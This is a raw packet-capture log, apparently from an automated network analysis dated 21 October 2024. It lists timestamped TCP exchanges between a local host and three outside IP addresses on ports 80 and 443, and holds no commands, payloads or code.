                                                                            Oct 21, 2024 11:04:07.876087904 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.876137972 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.876382113 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.876425982 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.876426935 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.876432896 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.876473904 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.876480103 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.876519918 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.876952887 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.876992941 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.877000093 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.877046108 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.877270937 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.877315044 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.877315998 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.877322912 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.877367020 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.877372026 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.877414942 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.877938986 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.877971888 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.877981901 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.877985954 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.878014088 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.878041983 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.878278971 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.878323078 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.878323078 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.878330946 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.878370047 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.878914118 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.878961086 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.878962994 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.878969908 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.879005909 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.879144907 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.879190922 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.879280090 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.879323006 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.879436016 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.879479885 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.879991055 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.880033016 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.880033970 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.880043983 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.880083084 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.880177021 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.880218983 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.880223036 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.880227089 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.880258083 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.880861998 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.880908012 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.880913019 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.880953074 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.881030083 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.881074905 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.935729027 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.935771942 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.936011076 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.936013937 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.936021090 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.936059952 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.936067104 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.936072111 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.936111927 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.936116934 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.936160088 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.936466932 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.936527967 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.936532021 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.936578989 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.936857939 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.936897039 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.936908007 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.936912060 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.936934948 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.936964035 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.936965942 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.937016010 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.937397957 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.937429905 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.937438965 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.937443972 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.937473059 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.937478065 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.937498093 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.937501907 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.937529087 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.937545061 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.937547922 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.937588930 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.938328028 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.938363075 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.938375950 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.938380003 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.938396931 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.938401937 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.938419104 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.938429117 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.938432932 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.938458920 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.938486099 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.938488960 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.938525915 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.939245939 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.939280987 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.939291000 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.939295053 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.939315081 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.939316988 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.939342022 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.939344883 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.939352036 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.939368010 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.939398050 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.939405918 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.939445972 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.940161943 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.940195084 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.940215111 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.940216064 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.940222979 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.940232038 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.940262079 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.940264940 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.940272093 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.940305948 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.940310001 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.940352917 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.941076994 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.941108942 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.941123962 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.941128969 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.941138983 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.941148043 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.941173077 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.941174030 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.941179991 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.941198111 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.941226006 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.941230059 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.941272020 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.941884041 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.941927910 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.991863012 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.992084026 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.992109060 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.992152929 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.992161036 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.992202044 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.992695093 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.992746115 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.992749929 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.992794991 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.992913961 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.992959023 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.993057966 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.993103027 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.993316889 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.993350983 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.993360996 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.993365049 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.993390083 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.993418932 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.993422031 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.993778944 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.993830919 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.993835926 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.993874073 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.994194984 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.994225979 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.994241953 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.994246006 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.994266987 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.994293928 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.994297028 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.994667053 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.994689941 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.994712114 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.994714975 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.994719028 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.994736910 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.994755983 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.994765043 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.994769096 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.994796991 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.994808912 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.994859934 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.994896889 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.994946957 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:08.203102112 CEST6251080192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:08.207928896 CEST8062510158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:08.208857059 CEST6251080192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:08.209033012 CEST6251080192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:08.213788033 CEST8062510158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:08.885462999 CEST8062510158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:08.888746977 CEST6251080192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:08.893769979 CEST8062510158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:09.039673090 CEST8062510158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:09.084666967 CEST6251080192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:09.385740995 CEST62511443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:09.385777950 CEST44362511188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:09.385849953 CEST62511443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:09.387270927 CEST62511443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:09.387283087 CEST44362511188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:10.004158974 CEST44362511188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:10.004265070 CEST62511443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:10.007759094 CEST62511443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:10.007769108 CEST44362511188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:10.008037090 CEST44362511188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:10.013812065 CEST62511443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:10.059444904 CEST44362511188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:10.153049946 CEST44362511188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:10.153140068 CEST44362511188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:10.153211117 CEST62511443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:10.159548998 CEST62511443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:10.164840937 CEST6251080192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:10.170443058 CEST8062510158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:10.315489054 CEST8062510158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:10.317401886 CEST62512443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:10.317430973 CEST44362512188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:10.317500114 CEST62512443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:10.317717075 CEST62512443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:10.317728043 CEST44362512188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:10.365945101 CEST6251080192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:10.917197943 CEST44362512188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:10.918683052 CEST62512443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:10.918699980 CEST44362512188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:11.057774067 CEST44362512188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:11.057853937 CEST44362512188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:11.057914019 CEST62512443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:11.063193083 CEST62512443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:11.066512108 CEST6251080192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:11.067517996 CEST6251380192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:11.071727991 CEST8062510158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:11.071788073 CEST6251080192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:11.072344065 CEST8062513158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:11.072413921 CEST6251380192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:11.072485924 CEST6251380192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:11.077195883 CEST8062513158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:11.715086937 CEST8062513158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:11.716288090 CEST62514443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:11.716329098 CEST44362514188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:11.716401100 CEST62514443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:11.716624022 CEST62514443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:11.716639996 CEST44362514188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:11.756572008 CEST6251380192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:12.329098940 CEST44362514188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:12.330562115 CEST62514443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:12.330594063 CEST44362514188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:12.473431110 CEST44362514188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:12.473562956 CEST44362514188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:12.473617077 CEST62514443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:12.473943949 CEST62514443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:12.477853060 CEST6251580192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:12.482795954 CEST8062515158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:12.482908964 CEST6251580192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:12.482969046 CEST6251580192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:12.487750053 CEST8062515158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:13.137375116 CEST8062515158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:13.140327930 CEST62516443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:13.140386105 CEST44362516188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:13.140460968 CEST62516443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:13.140693903 CEST62516443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:13.140722990 CEST44362516188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:13.178451061 CEST6251580192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:13.748651028 CEST44362516188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:13.750138998 CEST62516443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:13.750186920 CEST44362516188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:13.894489050 CEST44362516188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:13.894607067 CEST44362516188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:13.894661903 CEST62516443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:13.894957066 CEST62516443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:13.897870064 CEST6251580192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:13.898330927 CEST6251780192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:13.903158903 CEST8062517158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:13.903220892 CEST6251780192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:13.903266907 CEST6251780192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:13.903485060 CEST8062515158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:13.903536081 CEST6251580192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:13.908087015 CEST8062517158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:14.552258968 CEST8062517158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:14.553539038 CEST62518443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:14.553620100 CEST44362518188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:14.553713083 CEST62518443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:14.553911924 CEST62518443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:14.553924084 CEST44362518188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:14.600311995 CEST6251780192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:15.171502113 CEST44362518188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:15.172936916 CEST62518443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:15.172995090 CEST44362518188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:15.313137054 CEST44362518188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:15.313262939 CEST44362518188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:15.313317060 CEST62518443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:15.313632011 CEST62518443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:15.316509962 CEST6251780192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:15.317513943 CEST6251980192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:15.323702097 CEST8062519158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:15.323787928 CEST6251980192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:15.323848009 CEST6251980192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:15.324007034 CEST8062517158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:15.324055910 CEST6251780192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:15.330329895 CEST8062519158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:15.967912912 CEST8062519158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:15.968991995 CEST62520443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:15.969037056 CEST44362520188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:15.969100952 CEST62520443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:15.969316006 CEST62520443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:15.969327927 CEST44362520188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:16.022195101 CEST6251980192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:16.592363119 CEST44362520188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:16.594029903 CEST62520443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:16.594048977 CEST44362520188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:16.744159937 CEST44362520188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:16.744260073 CEST44362520188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:16.744409084 CEST62520443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:16.744663000 CEST62520443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:16.747600079 CEST6251980192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:16.748712063 CEST6252180192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:16.752969980 CEST8062519158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:16.753053904 CEST6251980192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:16.753643990 CEST8062521158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:16.753717899 CEST6252180192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:16.753762960 CEST6252180192.168.2.4158.101.44.242
